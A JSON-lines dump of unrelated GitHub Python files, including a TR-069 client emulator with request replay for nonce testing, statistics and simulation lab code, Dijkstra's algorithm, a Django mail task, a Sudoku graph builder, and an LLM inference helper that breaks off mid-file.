soap_action:\n # Add empty header.\n default_headers[\"SOAPAction\"] = \"\"\n else:\n default_headers[\"SOAPAction\"] = soap_action\n\n return default_headers\n\n def request(self, data: str, *, fix_cwmp_id: bool = True, **kwargs) 
-> requests.Response:\n \"\"\"\n Send a HTTP request to the ACS.\n\n Args:\n data: The request body\n fix_cwmp_id: If true, the cwmp:ID in the body will replaced with the cwmp:ID in the last response.\n **kwargs: Arguments passed to self._session.post()\n\n Returns:\n The ACS' response.\n \"\"\"\n kwargs.update(self.requests_kwargs)\n kwargs.setdefault(\"headers\", self._default_headers(data))\n\n # Re-use the cwmp:ID transmitted in the last response.\n # For client RPCs, that's going to be our default id, so nothing should be changed.\n # For server RPCs, that's the id sent by the server, which we need to account for.\n if fix_cwmp_id and self.messages:\n data = soap.fix_cwmp_id(data, self.messages[-1].text)\n\n resp = self._session.post(self.acs_url, data=data, **kwargs)\n self._record_response(resp)\n return resp\n\n def replay(self, request: Optional[requests.PreparedRequest] = None) -> requests.Response:\n \"\"\"\n Replay a request that has previously been sent.\n Useful to e.g. test for nonce re-use.\n\n Args:\n request: The request to replay. If no request is passed, the last request\n will be replayed.\n \"\"\"\n if request is None:\n request = self.messages[-1].request.copy()\n\n resp = self._session.send(request)\n self._record_response(resp)\n return resp\n\n def _record_response(self, response: requests.Response) -> None:\n self.messages.append(response)\n if self.log:\n # don't log request before sending it, requests adds its own headers after that.\n util.print_http_flow(response)\n\n def __repr__(self) -> str:\n return f\"tr069.Client({self.acs_url}, {len(self.messages)} messages)\"\n\n def done(self) -> requests.Response:\n \"\"\"Indicate to the ACS that the client has finished sending RPCs\"\"\"\n return self.request(\"\")\n\n def handle_server_rpcs(self) -> int:\n \"\"\"\n Handle server RPCs automatically, starting with the last already transmitted RPC.\n This is usually called immediately after .done()\n\n Returns:\n The number of handled RPCs\n\n Raises:\n NotImplementedError if automated handling of the RPC is not implemented.\n \"\"\"\n count = 0\n while True:\n rpc = self.messages[-1]\n if rpc.status_code == 204 or (rpc.status_code == 200 and rpc.text == \"\"):\n break\n self._handle_server_rpc(rpc)\n count += 1\n return count\n\n def _handle_server_rpc(self, rpc: requests.Response):\n rpc_name = soap.extract_rpc_name(rpc.text) or \"unknown\"\n if rpc_name == \"cwmp:SetParameterValues\":\n new_params = rpcs.parse_set_parameter_values(rpc.text)\n self.device.params.update({p.name: p for p in new_params})\n self.set_parameter_values_response()\n elif rpc_name == \"cwmp:GetParameterValues\":\n param_names = rpcs.parse_get_parameter_values(rpc.text)\n params = []\n for p in param_names:\n params.extend(self.device.params.all(p))\n self.get_parameter_values_response(params)\n elif rpc_name == \"cwmp:SetParameterAttributes\":\n warnings.warn(\"Ignoring cwmp:SetParameterAttributes\")\n self.set_parameter_attributes_response()\n elif rpc_name == \"cwmp:GetParameterNames\":\n # We ignore next_level because no-one validates that anyways.\n path, _ = rpcs.parse_get_parameter_names(rpc.text)\n params = self.device.params.all(path)\n self.get_parameter_names_response(params)\n elif rpc_name == \"cwmp:Download\":\n self.download_response()\n else:\n raise NotImplementedError(f\"Unknown server RPC: {rpc_name}\")\n\n def close(self) -> None:\n \"\"\"\n Close any existing connections to the ACS and reset the session.\n \"\"\"\n self._session.close()\n self._session = 
requests.Session()\n        if self.log:\n            print(\"Connection closed.\")\n\n    @_wrap_rpc(rpcs.make_inform)\n    def inform(self, **kwargs):\n        kwargs.setdefault(\"device\", self.device)\n        return self.request(rpcs.make_inform(**kwargs))\n\n    @_wrap_rpc(rpcs.make_get_rpc_methods)\n    def get_rpc_methods(self) -> requests.Response:\n        return self.request(rpcs.make_get_rpc_methods())\n\n    @_wrap_rpc(rpcs.make_request_download)\n    def request_download(self, *args, **kwargs):\n        return self.request(rpcs.make_request_download(*args, **kwargs))\n\n    @_wrap_rpc(rpcs.make_set_parameter_values_response)\n    def set_parameter_values_response(self, *args, **kwargs):\n        return self.request(rpcs.make_set_parameter_values_response(*args, **kwargs))\n\n    @_wrap_rpc(rpcs.make_get_parameter_values_response)\n    def get_parameter_values_response(self, *args, **kwargs):\n        return self.request(rpcs.make_get_parameter_values_response(*args, **kwargs))\n\n    @_wrap_rpc(rpcs.make_set_parameter_attributes_response)\n    def set_parameter_attributes_response(self):\n        return self.request(rpcs.make_set_parameter_attributes_response())\n\n    @_wrap_rpc(rpcs.make_get_parameter_names_response)\n    def get_parameter_names_response(self, *args, **kwargs):\n        return self.request(rpcs.make_get_parameter_names_response(*args, **kwargs))\n\n    @_wrap_rpc(rpcs.make_download_response)\n    def download_response(self, *args, **kwargs):\n        return self.request(rpcs.make_download_response(*args, **kwargs))\n","repo_name":"mhils/tr069","sub_path":"honeyclient/tr069/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"18491733777","text":"import timeit\r\nfrom random import *\r\nfrom numpy import *\r\n\r\nRcr = 2.16\r\nm = 5 # number of experiments\r\nb = 3 # rows\r\n\r\n\r\ndef show_norm():\r\n    global Rcr, m, b\r\n\r\n    # 4) Check the homogeneity of variance using Romanovsky's criterion\r\n    while True:\r\n        # Initial parameters\r\n        x1_min, x1_max = 10, 60\r\n        x2_min, x2_max = -35, 10\r\n        y_min, y_max = -70, 30\r\n        x = [[-1, -1, +1], # x1\r\n             [-1, +1, -1]] # x2\r\n        y = [[randint(y_min, y_max) for _ in range(0, m)]\r\n             for _ in range(0, b)]\r\n\r\n        # 4) Check the homogeneity of variance using Romanovsky's criterion\r\n        # 4.1. Find the mean value of the response function in each row:\r\n        y_ = [round(sum(y[i]) / len(y[i]), 2) for i in range(0, b)]\r\n\r\n        # 4.2. Find the row variances\r\n        sig_y = []\r\n        for i in range(0, b):\r\n            s = 0 # sum\r\n            for j in range(0, m):\r\n                s += (y[i][j] - y_[i]) ** 2\r\n            sig_y.append(round(s / m, 2))\r\n\r\n        # 4.3. Compute the base deviation. 't' means θ (theta)\r\n        sig_t = round(sqrt((2 * (2 * m - 2)) / (m * (m - 4))), 2)\r\n\r\n        # 4.4. Compute Fuv\r\n        Fuv = [round(sig_y[0] / sig_y[1], 2), # Fuv_1\r\n               round(sig_y[2] / sig_y[0], 2), # Fuv_2\r\n               round(sig_y[2] / sig_y[1], 2)] # Fuv_3\r\n\r\n        # 4.5 θuv. 'T' means θ (theta)\r\n        Tuv = [round(((m - 2) / m) * Fuv[i], 2) for i in range(0, b)]\r\n\r\n        # 4.6 Ruv\r\n        Ruv = [round(abs(Tuv[i] - 1) / sig_t, 2) for i in range(b)]\r\n\r\n        # 4.7 Check the criterion\r\n        R = [Ruv[i] < Rcr for i in range(b)]\r\n        if R[0] and R[1] and R[2]:\r\n            break\r\n        else:\r\n            print(\"Increasing the number of experiments.\", \"-\" * 23, sep=\"\\n\")\r\n            m += 1\r\n\r\n    # 5) Calculate the normalized coefficients of the regression equation\r\n    mx = [round(sum(x[i]) / b, 2) for i in range(2)]\r\n    my = round(sum(y_) / b, 2)\r\n    a = [round((x[0][0] ** 2 + x[0][1] ** 2 + x[0][2] ** 2) / b, 2),\r\n         round((x[0][0] * x[1][0] + x[0][1] * x[1][1] + x[0][2] * x[1][2]) / b, 2),\r\n         round((x[1][0] ** 2 + x[1][1] ** 2 + x[1][2] ** 2) / b, 2)]\r\n    a11 = round((x[0][0] * y_[0] + x[0][1] * y_[1] + x[0][2] * y_[2]) / b, 2)\r\n    a22 = round((x[1][0] * y_[0] + x[1][1] * y_[1] + x[1][2] * y_[2]) / b, 2)\r\n\r\n    # Solve the system of linear equations\r\n    matrix = array([[1, mx[0], mx[1]],\r\n                    [mx[0], a[0], a[1]],\r\n                    [mx[1], a[1], a[2]]])\r\n    vector = array([my, a11, a22])\r\n    solve = linalg.solve(matrix, vector)\r\n\r\n    # 6) Naturalization of the coefficients\r\n    dx1, dx2 = fabs(x1_max - x1_min) / 2, fabs(x2_max - x2_min) / 2\r\n    x10, x20 = (x1_max + x1_min) / 2, (x2_max + x2_min) / 2\r\n    a0 = round(solve[0] - solve[1] * x10 / dx1 - solve[2] * x20 / dx2, 2)\r\n    a1 = round(solve[1] / dx1, 2)\r\n    a2 = round(solve[2] / dx2, 2)\r\n\r\n#show_norm()\r\n\r\n\r\nif __name__ == '__main__':\r\n    print(timeit.timeit(\"show_norm()\", setup=\"from __main__ import show_norm\", number = 100)/100)\r\n\"\"\"Romanovsky's criterion was used in this work to check the homogeneity of variance\"\"\"\r\n","repo_name":"Polmortem/Lab-works-of-student-27-from-IO-83","sub_path":"Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37301389354","text":"import numpy.random as rd\r\n\r\nN_DISHES = 8\r\nN_DRINKS = 8\r\nN_DESERT = 8\r\nN_ENTRIES = 8\r\nN_SOUP = 2\r\nENTRIES_LIST = [\r\n    f'entry_{i}' for i in range(N_ENTRIES)\r\n]\r\nHOT_DISH_LIST = [\r\n    f'hot_dish_{i}' for i in range(N_DISHES)\r\n]\r\nDRINK_LIST = [\r\n    f'drink_{i}' for i in range(N_DRINKS)\r\n]\r\n\r\nDESERT_LIST = [\r\n    f'desert_{i}' for i in range(N_DESERT)\r\n]\r\nSOUP_LIST = [\r\n    f'soup_{i}' for i in range(N_SOUP)\r\n]\r\n\r\n\r\nclass Dining_Hall :\r\n    def __init__(self, mode) -> None:\r\n        self.student_list: list[Student] = [] # students present in the dining hall\r\n        self.mode = mode # the mode corresponds to the type of behaviour observed\r\n        # #-------SOUP----------------#\r\n        # self.soups_list = HOT_DISH_LIST\r\n        # self.soups_queue :list[Student] = []\r\n        # self.soups_student_serving :list[(Student,int)] = []\r\n\r\n        # #-------ENTRY---------------#\r\n        # self.entries_list = HOT_DISH_LIST\r\n        # self.entries_queue :list[Student] = []\r\n        # self.entries_student_serving :list[(Student,int)] = []\r\n\r\n        #-------HOT_DISHES---------------#\r\n        self.hot_dishes_list = HOT_DISH_LIST\r\n        self.hot_dishes_queue :list[Student] = []\r\n        self.hot_dishes_student_serving :list[(Student,int)] = []\r\n        self.hot_dishes_queues_mode_1 :dict = {dish : [] for dish in self.hot_dishes_list}\r\n        self.hot_dishes_student_serving_mode_1 :list[(Student,str)] = []\r\n\r\n        # #-------DRINKS---------------#\r\n        # self.drinks_list = DRINK_LIST\r\n        # self.drinks_queue :list[Student] = []\r\n        # self.drinks_student_serving :list[(Student,int)] = []\r\n\r\n        # 
#-------DESERT---------------#\r\n # self.deserts_list = DRINK_LIST\r\n # self.deserts_queue :list[Student] = []\r\n # self.deserts_student_serving :list[(Student,int)] = []\r\n\r\n self.isClose = False\r\n self.student_eating_list :list[Student] = []\r\n\r\n def process_queue(self) :\r\n if self.mode == 0 :\r\n while len(self.hot_dishes_queue) != 0 :\r\n idx_list = [idx for stud, idx in self.hot_dishes_student_serving]\r\n idx = min(idx_list + [len(self.hot_dishes_list)])\r\n stud = self.hot_dishes_queue[0]\r\n stud_dish = stud.hot_dishes[0]\r\n if stud_dish in self.hot_dishes_list[:idx] :\r\n self.hot_dishes_student_serving.append((stud, self.hot_dishes_list.index(stud_dish)))\r\n self.hot_dishes_queue.remove(stud)\r\n else : \r\n break\r\n for stud,idx in self.hot_dishes_student_serving : \r\n stud.serve()\r\n\r\n for stud in self.hot_dishes_queue :\r\n stud.wait()\r\n else :\r\n for dish in self.hot_dishes_queues_mode_1 :\r\n queue = self.hot_dishes_queues_mode_1[dish]\r\n while len(queue) != 0 :\r\n dish_list = [dish for stud, dish in self.hot_dishes_student_serving_mode_1]\r\n stud = queue[0]\r\n if dish not in dish_list :\r\n self.hot_dishes_student_serving_mode_1.append((stud, dish))\r\n self.hot_dishes_queues_mode_1[dish].remove(stud)\r\n else : \r\n break\r\n for stud,dish in self.hot_dishes_student_serving_mode_1 : \r\n stud.serve()\r\n\r\n for dish in self.hot_dishes_queues_mode_1 :\r\n for stud in self.hot_dishes_queues_mode_1[dish] :\r\n stud.wait()\r\n \r\n def process_eating(self, time) :\r\n for stud in self.student_eating_list :\r\n stud.eat(time)\r\n\r\n \r\n\r\n\r\nclass Student :\r\n def __init__(self, sid, dining_hall, mode) :\r\n self.sid = sid\r\n self.mode = mode\r\n self.dining_hall : Dining_Hall = dining_hall\r\n self.wait_time : int = 0 # wait time in seconds\r\n self.move : int = rd.normal(20, 5, 1) # time to go to the restaurant\r\n self.move_time : int = self.move\r\n self.is_moving : bool = False\r\n self.time_to_eat : int = rd.normal(1000, 300) # time the student has been eating\r\n self.eat_time : int = 0\r\n self.random_hot_dishes : int = rd.randint(0,8,size = int(4*rd.random())+1)\r\n # self.entries = self.dining_hall.entries_list\r\n self.hot_dishes = [self.dining_hall.hot_dishes_list[i] for i in self.random_hot_dishes]\r\n # self.drinks = self.dining_hall.drinks_list\r\n # self.deserts = self.dining_hall.deserts_list\r\n # self.soups = self.dining_hall.soups_list\r\n\r\n self.serve_time : int = 0\r\n self.time_to_serve: int = 20 \r\n \r\n def wants_to_eat(self) :\r\n return len(self.hot_dishes) > 0 \r\n \r\n def eat(self, time) :\r\n self.eat_time += 1\r\n if self.time_to_eat <= self.eat_time :\r\n self.eat_time = 0\r\n self.hot_dishes.pop(0)\r\n # the student leaves either because he does not want anything else or the access to the food is close\r\n if not self.wants_to_eat() or time > 10800:\r\n self.leave_dining_hall()\r\n else : \r\n self.go_to_queue()\r\n self.dining_hall.student_eating_list.remove(self)\r\n \r\n def serve(self) :\r\n if self.mode == 0 :\r\n self.serve_time += 1\r\n if self.time_to_serve <= self.serve_time :\r\n self.serve_time = 0\r\n self.dining_hall.hot_dishes_student_serving.remove((self,self.dining_hall.hot_dishes_list.index(self.hot_dishes[0])))\r\n self.go_to_eat()\r\n else :\r\n self.serve_time += 1\r\n if self.time_to_serve <= self.serve_time :\r\n self.serve_time = 0\r\n self.dining_hall.hot_dishes_student_serving_mode_1.remove((self, self.hot_dishes[0]))\r\n self.go_to_eat()\r\n\r\n def go_to_queue(self) :\r\n if 
self.mode == 0 :\r\n            self.dining_hall.hot_dishes_queue.append(self)\r\n        else : \r\n            self.dining_hall.hot_dishes_queues_mode_1[self.hot_dishes[0]].append(self)\r\n\r\n\r\n    def go_to_eat(self) :\r\n        self.dining_hall.student_eating_list.append(self)\r\n\r\n    def leave_dining_hall(self) :\r\n        self.dining_hall.student_list.remove(self)\r\n        # eat() removes the student from student_eating_list right after this call,\r\n        # so removing it here as well would raise ValueError on the second remove\r\n    \r\n    def wait(self) :\r\n        self.wait_time += 1\r\n    \r\n\r\n    \r\n","repo_name":"ArnaudMi/InternationalHouseRestaurantSimulation","sub_path":"code_2.0/InternationalHouse.py","file_name":"InternationalHouse.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74191487848","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\nstart = int(input())\ngraph = [[] for _ in range(n + 1)]\ndistance = [INF] * (n + 1)\n\nfor _ in range(m):\n    a, b, c = map(int, input().split())\n    # the cost of going from node a to node b is c\n    graph[a].append((b, c))\n\ndef dijkstra(start):\n    q = []\n    heapq.heappush(q, (0, start))\n    distance[start] = 0\n\n    while q:\n        dist, now = heapq.heappop(q)\n\n        # skip if a shorter distance to the current node is already recorded\n        if distance[now] < dist:\n            continue\n\n        for i in graph[now]:\n            cost = dist + i[1]\n\n            if cost < distance[i[0]]:\n                distance[i[0]] = cost\n                heapq.heappush(q, (cost, i[0]))\n\ndijkstra(start)\nfor i in range(1, n + 1):\n    # print INFINITY if the node is unreachable\n    if distance[i] == INF:\n        print('INFINITY')\n    else:\n        print(distance[i])","repo_name":"GangHub1970/Algorithm","sub_path":"algorithm/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11483474133","text":"################ Reading files 4: read two fields (name, English score) per line; common statistics with a dict ####################\n# list tuple set dict stack queue\nwith open('六年级学生9个班成绩.txt',\"r\") as fr:\n    i=0\n    dt={}   # define a dict named dt, e.g. dt['fox']=12, dt={\"fox\": 12}\n    while True:\n        s0=fr.readline()\n        if len(s0)<2:\n            break\n        s1=s0.replace('\\n','') # strip the trailing newline\n        s2=s1.split('\\t')      # split the line into fields on tabs\n        #print(s2[0],s2[4])\n        if i>0:  # skip the Chinese header row\n            dt[s2[0]]=int(s2[4])  # add the key-value pair to the dict\n        i=i+1\nfr.close()  # redundant: the with-block already closed the file\nprint(\"Count: {0}\".format(len(dt)))\n\n# sort by English score (ascending), printed with names; d[0]: name, d[1]: score\ndt2=sorted(dt.items(), key=lambda d: d[1], reverse=False)\n#print(dt2);print()\n\n# sort by English score (descending), printed with names:\ndt3=sorted(dt.items(), key=lambda d: d[1], reverse=True)\n#print(dt3);print()\nfor m in dt3:\n    #print(m)\n    #print(m[0],m[1])\n    print(m[0]+\": \"+str(m[1])+\" points\")\n\n\n# sort by surname character code, printed with names:\ndt4=sorted(dt.items(), key=lambda d: d[0])\n#print(dt4);print()\n\n","repo_name":"xiang-daode/Python3_codes","sub_path":"六年级学生9个班成绩_4逐行读取与排序.py","file_name":"六年级学生9个班成绩_4逐行读取与排序.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26378273133","text":"from django.core.mail import send_mail\nfrom wex.celery import app\nfrom celery import shared_task\nfrom django import template\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\n\n@shared_task\ndef send_welcome_mail(host, username, token_key):\n    user = User.objects.filter(username=username).first()\n    if user:\n        ctx = {\"host\": host, \"user\": user, \"token_key\": token_key}\n        html = template.loader.get_template('emails/welcome-mail.html').render(ctx) \n        send_mail(\n            'WELCOME',\n            'msg',\n            
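# the sender address below is hard-coded; Django projects usually pass settings.DEFAULT_FROM_EMAIL here\n            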
'amobitinfo@gmail.com',\n [user.email],\n fail_silently=False,\n html_message = html\n )","repo_name":"samuelitwaru/wex-erp","sub_path":"core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11415866425","text":"from graph import Graph\r\nfrom math import sqrt\r\nclass SudokuConnections : \r\n def __init__(self,n) : # constructor\r\n\r\n self.graph = Graph(n) # Graph Object\r\n self.n=n\r\n self.rows = n\r\n self.cols = n\r\n self.total_blocks = self.rows*self.cols #81\r\n\r\n self.__generateGraph() # Generates all the nodes\r\n self.connectEdges() # connects all the nodes acc to sudoku constraints\r\n\r\n self.allIds = self.graph.getAllNodesIds() # storing all the ids in a list\r\n\r\n \r\n\r\n def __generateGraph(self) :\r\n for idx in range(1, self.total_blocks+1) : \r\n _ = self.graph.addNode(idx)\r\n\r\n def connectEdges(self) :\r\n matrix = self.__getGridMatrix()\r\n\r\n head_connections = dict() # head : connections\r\n\r\n for row in range(self.n) :\r\n for col in range(self.n) :\r\n\r\n head = matrix[row][col] #id of the node\r\n connections = self.__whatToConnect(matrix, row, col)\r\n\r\n head_connections[head] = connections\r\n # connect all the edges\r\n\r\n self.__connectThose(head_connections=head_connections)\r\n\r\n def __connectThose(self, head_connections) :\r\n for head in head_connections.keys() : #head is the start idx\r\n connections = head_connections[head]\r\n for key in connections : #get list of all the connections\r\n for v in connections[key] :\r\n self.graph.addEdge(src=head, dst=v)\r\n\r\n\r\n def __whatToConnect(self, matrix, rows, cols) :\r\n connections = dict()\r\n\r\n row = []\r\n col = []\r\n block = []\r\n\r\n # ROWS\r\n for c in range(cols + 1, self.n):\r\n if rows < self.n and c < self.n:\r\n row.append(matrix[rows][c])\r\n\r\n connections[\"rows\"] = row\r\n\r\n # COLS\r\n for r in range(rows + 1, self.n):\r\n if r < self.n and cols < self.n:\r\n col.append(matrix[r][cols])\r\n\r\n connections[\"cols\"] = col\r\n # BLOCKS\r\n block_start_row = (rows // int(sqrt(self.n))) * int(sqrt(self.n))\r\n block_start_col = (cols // int(sqrt(self.n))) * int(sqrt(self.n))\r\n for i in range(block_start_row, block_start_row + int(sqrt(self.n))):\r\n for j in range(block_start_col, block_start_col + int(sqrt(self.n))):\r\n if i != rows and j != cols and i < self.n and j < self.n:\r\n block.append(matrix[i][j])\r\n\r\n connections[\"blocks\"] = block\r\n return connections\r\n\r\n\r\n def __getGridMatrix(self) :\r\n matrix = [[0 for cols in range(self.cols)]\r\n for rows in range(self.rows)]\r\n\r\n count = 1\r\n for rows in range(self.n) :\r\n for cols in range(self.n):\r\n matrix[rows][cols] = count\r\n count+=1\r\n return matrix\r\n","repo_name":"Kodjumba/LETIE","sub_path":"sudoku_connections.py","file_name":"sudoku_connections.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14225450272","text":"import json\nimport os\nimport time\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoModel\nfrom transformers import LlamaTokenizer, LlamaForCausalLM\nfrom transformers import GPT2Tokenizer, GPT2Model, GPT2LMHeadModel\n\nimport transformers\nimport argparse\n\nimport requests\n\ndef generate_openai_response(messages, api_key, model=\"gpt-3.5-turbo\"):\n url = 
\"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\",\n }\n \n data = {\n \"model\": model,\n \"messages\": messages\n }\n \n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n chat_output = response.json()\n assistant_message = chat_output[\"choices\"][0][\"message\"][\"content\"]\n return assistant_message.strip()\n else:\n return f\"Error: {response.status_code}, {response.text}\"\n\ndef create_openai_message_object(text):\n # Initialize message object list\n messages = []\n \n # Search for the system, human, and response sections in the text\n system_start = text.find(\"### SYSTEM:\")\n human_start = text.find(\"### HUMAN:\") if text.find(\"### HUMAN:\") != -1 else text.find(\"### USER:\")\n response_start = text.find(\"### RESPONSE:\")\n \n # If both system and human sections are found, extract the content\n if system_start != -1 and human_start != -1:\n system_content = text[system_start + 11: human_start].strip()\n human_content = text[human_start + 11: response_start if response_start != -1 else None].strip()\n \n messages.append({\"role\": \"system\", \"content\": system_content})\n messages.append({\"role\": \"user\", \"content\": human_content})\n else:\n # If the system section is not found, just use the whole text as the user content\n messages.append({\"role\": \"user\", \"content\": text.strip()})\n \n return messages\n\n\ndef generate_deci_response(prompt, settings, max_new_tokens=4096, do_sample=True, top_p=0.95, early_stopping=True, num_beams=5, device = \"cuda\"):\n # for GPU usage or \"cpu\" for CPU usage\n\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n\n # Tokenize the prompt and send it to the device\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\", padding=True, truncation=True)\n \n if torch.cuda.is_available():\n # inputs = {key: val.to('cuda') for key, val in inputs.items()}\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n\n # Extract the input_ids and attention_mask\n input_ids = inputs['input_ids'] # Already on device\n attention_mask = inputs['attention_mask'] # Already on device\n\n # Generate text using the model\n outputs = settings[\"model\"].generate(input_ids, do_sample=do_sample, top_p=top_p, attention_mask=attention_mask, early_stopping=early_stopping, num_beams=num_beams)\n \n # Decode the output tensor to text\n return settings[\"tokenizer\"].decode(outputs[0], skip_special_tokens=True)\n\n\ndef generate_stabilityai_response(prompt, settings, max_new_tokens=4096, do_sample=True, top_p=0.95, top_k=0):\n # Prepare inputs for the model\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\").to(settings[\"device\"])\n \n # Move inputs to GPU if available\n if torch.cuda.is_available():\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n \n # Remove the attention_mask from inputs if it exists\n if 'attention_mask' in inputs:\n del inputs['attention_mask']\n \n # Generate output using the model\n output = settings[\"model\"].generate(**inputs, do_sample=do_sample, top_p=top_p, top_k=top_k, max_new_tokens=max_new_tokens)\n \n # Decode and return the output\n return settings[\"tokenizer\"].decode(output[0], skip_special_tokens=True)\n\n\ndef generate_marx_response(prompt, settings, max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0): \n input_ids = settings[\"tokenizer\"](prompt, 
return_tensors=\"pt\").input_ids\n input_ids = input_ids.to(settings[\"device\"])\n\n # Print device of model parameters\n # for param in settings[\"model\"].parameters():\n # print(param.device)\n\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\", legacy=False).to(settings[\"device\"])\n # Move inputs to GPU if available\n if torch.cuda.is_available():\n # inputs = {key: val.to('cuda') for key, val in inputs.items()}\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n\n output = settings[\"model\"].generate(**inputs, do_sample=do_sample, top_p=top_p, top_k=top_k, max_new_tokens=max_new_tokens)\n\n return settings[\"tokenizer\"].decode(output[0], skip_special_tokens=True)\n\n \ndef generate_falcon_1b_response(prompt, settings, max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n sequences = settings[\"pipeline\"](\n prompt,\n max_length=max_new_tokens,\n do_sample=do_sample,\n top_k=top_k,\n num_return_sequences=num_return_sequences,\n eos_token_id=settings[\"tokenizer\"].eos_token_id,\n )\n responses = []\n for seq in sequences:\n responses.append(seq['generated_text'])\n \n return responses[0]\n\ndef generate_chatglm_6b_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n response, history = settings[\"model\"].chat(settings[\"tokenizer\"], prompt, history=history)\n \n response_out = {\n \"response\" : response,\n \"history\" : history\n }\n\n return json.dumps(response_out)\n\ndef generate_gpt2_response(prompt, settings, max_new_tokens=512, do_sample=True, top_p=0.95, top_k=0, device=\"cuda\", num_return_sequences=1):\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n \n # Tokenize the input and get attention mask\n encoded_input = settings[\"tokenizer\"](prompt, return_tensors='pt', padding=True, truncation=True)\n \n # Extract the input_ids and attention_mask\n input_ids = encoded_input['input_ids'].to(device) # Move to device\n attention_mask = encoded_input['attention_mask'].to(device) # Move to device\n\n # Generate model output\n output_data = settings[\"model\"].generate(input_ids, top_p=top_p, do_sample=True, attention_mask=attention_mask, max_length=max_new_tokens)\n\n output = settings[\"tokenizer\"].decode(output_data[0], skip_special_tokens=True)\n\n return output\n\n\n\ndef generate_gptj_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n \n # Tokenize the input and get attention mask\n encoded_input = settings[\"tokenizer\"](prompt, return_tensors='pt', padding=True, truncation=True)\n \n # Extract the input ids and attention mask\n input_ids = encoded_input['input_ids']\n attention_mask = encoded_input['attention_mask']\n\n # Generate model output\n output_data = settings[\"model\"].generate(input_ids, attention_mask=attention_mask, max_length=max_new_tokens)\n\n output = settings[\"tokenizer\"].decode(output_data[0], skip_special_tokens=True)\n\n return output\n\ndef generate_mistral_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n messages = []\n # Search for the system, human, and response sections in the text\n system_start = prompt.find(\"### SYSTEM:\")\n human_start = prompt.find(\"### HUMAN:\") if 
prompt.find(\"### HUMAN:\") != -1 else prompt.find(\"### USER:\")\n response_start = prompt.find(\"### RESPONSE:\")\n \n # If both system and human sections are found, extract the content\n if system_start != -1 and human_start != -1:\n system_content = prompt[system_start + 11: human_start].strip()\n human_content = prompt[human_start + 11: response_start if response_start != -1 else None].strip()\n \n messages.append({\"role\": \"system\", \"content\": system_content})\n messages.append({\"role\": \"user\", \"content\": human_content})\n else:\n # If the system section is not found, just use the whole text as the user content\n messages.append({\"role\": \"user\", \"content\": prompt.strip()})\n\n\n encodeds = settings[\"tokenizer\"].apply_chat_template(messages, return_tensors=\"pt\")\n\n model_inputs = encodeds.to(device)\n settings[\"model\"].to(device)\n\n generated_ids = settings[\"model\"].generate(model_inputs, max_new_tokens=1000, do_sample=True)\n output = settings[\"tokenizer\"].batch_decode(generated_ids)\n \n return output\n\ndef unload_gpu(settings):\n del settings[\"model\"]\n del settings[\"tokenizer\"]\n if \"pipeline\" in settings:\n del settings[\"pipeline\"]\n torch.cuda.empty_cache()\n\ndef setup_model(model_base = \"Deci\"):\n checkpoint = \"\"\n device = \"\"\n pipeline = None\n tokenizer = None\n model = None\n\n if model_base == \"stabilityai\":\n checkpoint = \"stabilityai/StableBeluga-7B\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = AutoTokenizer.from_pretrained(\"stabilityai/StableBeluga-7B\", use_fast=False)\n model = AutoModelForCausalLM.from_pretrained(\"stabilityai/StableBeluga-7B\", torch_dtype=torch.float16, low_cpu_mem_usage=True)\n\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n elif model_base == \"Marx\":\n checkpoint = \"acrastt/Marx-3B-V2\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = LlamaTokenizer.from_pretrained(checkpoint)\n model = LlamaForCausalLM.from_pretrained(\n checkpoint, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map=device\n )\n\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n elif 